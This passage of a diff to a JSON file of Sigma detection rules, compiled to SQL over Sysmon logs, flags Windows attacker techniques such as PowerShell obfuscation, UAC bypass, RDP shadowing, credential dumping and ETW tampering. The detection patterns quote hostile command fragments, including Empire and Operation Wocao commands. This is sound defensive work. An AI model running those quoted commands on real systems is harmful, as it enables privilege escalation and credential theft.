'% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + "Legitimate deinstallation by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "status": "test", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "status": "test", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_download_dll.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "status": "test", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR 